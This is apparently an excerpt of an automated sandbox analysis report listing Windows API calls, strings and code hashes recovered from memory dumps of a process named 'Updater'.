                                                                                                  • API ID: Variant$Init$ClearCopy
                                                                                                  • String ID: Dw
                                                                                                  • API String ID: 1426616791-3024475581
                                                                                                  • Opcode ID: f4be62d322e1eecad8071ec38eed6c3470f94c6d7c768a5f76def2fbae17d2a5
                                                                                                  • Instruction ID: c4e720e0c115cd8518a4131e204af2af9c9321408f03eff20e8501b398d70be1
                                                                                                  • Opcode Fuzzy Hash: f4be62d322e1eecad8071ec38eed6c3470f94c6d7c768a5f76def2fbae17d2a5
                                                                                                  • Instruction Fuzzy Hash: 45111EB29003099FC720DF99D88489AFBF8FB18310B10866FE94A97611D775AA44CF94
                                                                                                  APIs
                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 0073EF22
                                                                                                  • IsWindowVisible.USER32(?), ref: 0073EF2D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendTimeoutVisibleWindow
                                                                                                  • String ID: 4z
                                                                                                  • API String ID: 2309912316-4023123785
                                                                                                  • Opcode ID: d19de0f47ec925be39e0625b39f0eb7537732e27f3641a16ee92678ae64c994c
                                                                                                  • Instruction ID: 912279e3eabfcf1e759d69a4f73dd1d49e9ea7bf697c07db5afb27ccdb434ea4
                                                                                                  • Opcode Fuzzy Hash: d19de0f47ec925be39e0625b39f0eb7537732e27f3641a16ee92678ae64c994c
                                                                                                  • Instruction Fuzzy Hash: 34016771A00119ABEB50EB60CD45DFF776D9B15740F404076F806E2281DB689F0587E6
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 007154A7
                                                                                                  • FreeLibrary.KERNEL32 ref: 007154CD
                                                                                                  Strings
                                                                                                  • GetSystemWow64DirectoryW, xrefs: 007154A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                  • String ID: GetSystemWow64DirectoryW
                                                                                                  • API String ID: 3013587201-1150568532
                                                                                                  • Opcode ID: 693d529276ed38aff988f4645f0105926ee7686b8d7cec1650262372de4c2c7f
                                                                                                  • Instruction ID: 55321db11a3a66eec34b64aad76a868ec5e1bbdd6c4b3c49fe2c834eedc8c71a
                                                                                                  • Opcode Fuzzy Hash: 693d529276ed38aff988f4645f0105926ee7686b8d7cec1650262372de4c2c7f
                                                                                                  • Instruction Fuzzy Hash: A0E0DFB1E12E26D7C77D96684C84AED22266F52745F058011FD03EA280EBBCCE844690
                                                                                                  APIs
                                                                                                    • Part of subcall function 006EFF7F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006F1340,?,?,?,006D100A), ref: 006EFF84
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,006D100A), ref: 006F1344
                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006D100A), ref: 006F1353
                                                                                                  Strings
                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006F134E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                  • API String ID: 55579361-631824599
                                                                                                  • Opcode ID: 86b52f88f1f64f5cdc7f1a29b4d3baa5fd25ecfa82906631851e435801ed9522
                                                                                                  • Instruction ID: de6051359c5d134e129eca064f8d531ddf80ab00fca75c78c279282c8668e5db
                                                                                                  • Opcode Fuzzy Hash: 86b52f88f1f64f5cdc7f1a29b4d3baa5fd25ecfa82906631851e435801ed9522
                                                                                                  • Instruction Fuzzy Hash: 04E06D71600345CFD7709F29D808756BBE5BB12780F04C92DE586C6A81D7F8E4448BE1
                                                                                                  APIs
                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00762C90
                                                                                                  • PostMessageW.USER32(00000000), ref: 00762C97
                                                                                                    • Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                  • String ID: Shell_TrayWnd
                                                                                                  • API String ID: 529655941-2988720461
                                                                                                  • Opcode ID: a223d4121ecceae19de44db96e23bf4e40105145bb5281124641b30db44dd4b0
                                                                                                  • Instruction ID: 3e8b46df471a295df30b454188b363a79375bbaac3adc2e8d8842f9efd9f7c16
                                                                                                  • Opcode Fuzzy Hash: a223d4121ecceae19de44db96e23bf4e40105145bb5281124641b30db44dd4b0
                                                                                                  • Instruction Fuzzy Hash: DDD0A932B94302ABF678B730EC0FFC36A109B08B80F000821F206AA0C1C8E8AC00C648
                                                                                                  APIs
                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00762C50
                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00762C63
                                                                                                    • Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                  • String ID: Shell_TrayWnd
                                                                                                  • API String ID: 529655941-2988720461
                                                                                                  • Opcode ID: 3f01c3e556ba88ef034617e1a84852bf152df506999aa47b2768a4ac57b1ba7e
                                                                                                  • Instruction ID: 3184176d2736debb6b5bd333b3d3a904d2b06144c8376f476d65b23381d6d456
                                                                                                  • Opcode Fuzzy Hash: 3f01c3e556ba88ef034617e1a84852bf152df506999aa47b2768a4ac57b1ba7e
                                                                                                  • Instruction Fuzzy Hash: 09D0A731794301A7F6747730DC0FFC369105B04740F000421F206590C1C4E89C00C644